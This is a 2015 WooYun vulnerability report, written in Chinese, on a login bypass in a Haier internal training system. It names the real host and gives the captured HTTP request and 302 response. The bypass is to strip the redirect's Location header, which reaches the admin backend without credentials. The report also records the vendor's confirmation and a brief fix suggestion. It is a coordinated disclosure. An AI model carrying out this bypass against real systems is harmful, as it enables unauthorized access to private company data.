当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100275

漏洞标题:海尔某系统登陆绕过

相关厂商:海尔集团

漏洞作者: ToySweet

提交时间:2015-03-10 16:33

修复时间:2015-04-24 16:34

公开时间:2015-04-24 16:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-10: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-24: 细节向公众公开

简要描述:

登陆绕过

详细说明:

之前有人提交过
WooYun: 海尔某系统弱口令致大量公司内部资料泄密
现在被绕过了,测试过程
http://home.ithaier.com/techdep/login/
随便输入账号密码如下图

haer.png


抓取数据包

GET /techdep/login/?url=http://home.ithaier.com/techdep/training/ HTTP/1.1
Host: home.ithaier.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=q4hr9asmj0l59096qftt7remu4
Connection: keep-alive
Cache-Control: max-age=0


访问http://home.ithaier.com/techdep/training/
响应报如下

HTTP/1.1 302 Moved Temporarily
Date: Mon, 09 Mar 2015 02:09:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://home.ithaier.com/techdep/login/?url=http://home.ithaier.com/techdep/training/
Content-type: text/html
Content-Length: 4005


去除
Location: http://home.ithaier.com/techdep/login/?url=http://home.ithaier.com/techdep/training/
直接登陆后台

haer.png


漏洞证明:

haer.png

修复方案:

判断cookie,控制数据包返回

版权声明:转载请注明来源 ToySweet@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-13 10:56

厂商回复:

谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无


漏洞评价:

评论